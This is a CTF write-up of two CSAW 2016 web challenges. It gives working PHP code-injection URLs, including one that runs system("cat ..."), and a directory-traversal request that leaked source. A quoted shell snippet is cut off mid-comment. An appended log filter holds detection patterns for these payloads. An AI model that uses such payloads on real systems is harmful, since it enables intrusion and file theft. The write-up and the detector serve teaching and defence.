[Writeup] CSAW CTF 2016

mfw (125)

Main URL: http://web.chal.csaw.io:8000

Fuzzing the page parameter quickly turns up PHP code injection (the value is concatenated into a string that gets evaluated, as the flag text hints):

http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27

Play with it to read the flag:

http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27

flag{3vald_@ss3rt_1s_best_a$$ert}

wtf.sh 1 (150)

http://web.chal.csaw.io:8001

Register an account and log in. Create a post, then view it. While fuzzing, I found a directory traversal (WTF? traversal again). Requesting

http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../

returned some source code. I guess it reads every file in that directory, like `cat *` :)). After running the output through a decoder to get readable code, I found some interesting functions:

```sh
# hash passwords before storing them
function hash_password {
    local password=$1;
    (shasum <<< ${password}) | cut -d\  -f1;
}

# hash usernames for lookup in the users_lookup table
function hash_username {
    local username=$1;
    (shasum <<< ${username}) | cut -d\  -f1;
}

# generate a random token, bas
```
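As an added example (not part of the original writeup), a small POSIX shell filter that flags access-log lines carrying the two request shapes seen above, the quoted-concatenation PHP injection on `page` and the `../` traversal on `post`, whether percent-encoded or plain; the log lines are constructed for this example.

```shell
#!/bin/sh
# Constructed sample access log (not from the challenge): the first line of each
# group is benign, the others carry the payload shapes from the writeup.
SAMPLE_LOG='10.0.0.5 - - [16/Sep/2016:12:00:01 +0000] "GET /?page=about HTTP/1.1" 200 512
10.0.0.5 - - [16/Sep/2016:12:00:07 +0000] "GET /?page=about%27.phpinfo%28%29.%27 HTTP/1.1" 200 9012
10.0.0.5 - - [16/Sep/2016:12:00:19 +0000] "GET /?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27 HTTP/1.1" 200 64
10.0.0.9 - - [16/Sep/2016:12:01:03 +0000] "GET /post.wtf?post=zabOA HTTP/1.1" 200 1400
10.0.0.9 - - [16/Sep/2016:12:01:10 +0000] "GET /post.wtf?post=zabOA/../../ HTTP/1.1" 200 31000
10.0.0.9 - - [16/Sep/2016:12:01:20 +0000] "GET /post.wtf?post=zabOA%2F..%2F..%2F HTTP/1.1" 200 31000'

# A closing quote followed by PHP's '.' concatenation and a call, or a call to a
# code/command-execution function: the shape of the mfw payloads.
PHP_INJECT_RE="'\\.[a-zA-Z_]+\\(|(^|[^a-zA-Z0-9_])(system|passthru|shell_exec|exec|popen|phpinfo|eval|assert)\\("
# Parent-directory traversal as used against post.wtf.
TRAVERSAL_RE='\.\./'

# Extract the quoted request line and undo the few percent-encodings the
# payloads rely on, so encoded and plain variants hit the same rules.
decode_request() {
  sed -e 's/^[^"]*"\([^"]*\)".*$/\1/' \
      -e 's/%2[eE]/./g; s/%2[fF]/\//g; s/%27/'"'"'/g' \
      -e 's/%28/(/g; s/%29/)/g; s/%22/"/g'
}

# Read log lines on stdin; print every line whose request matches a rule.
flag_suspicious_requests() {
  while IFS= read -r line; do
    req=$(printf '%s\n' "$line" | decode_request)
    if printf '%s\n' "$req" | grep -Eq -e "$TRAVERSAL_RE" -e "$PHP_INJECT_RE"; then
      printf '%s\n' "$line"
    fi
  done
}

# Number of flagged lines in the sample log (4: two injections, two traversals).
count_flagged() {
  printf '%s\n' "$SAMPLE_LOG" | flag_suspicious_requests | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_LOG" | flag_suspicious_requests
echo "flagged: $(count_flagged)"
```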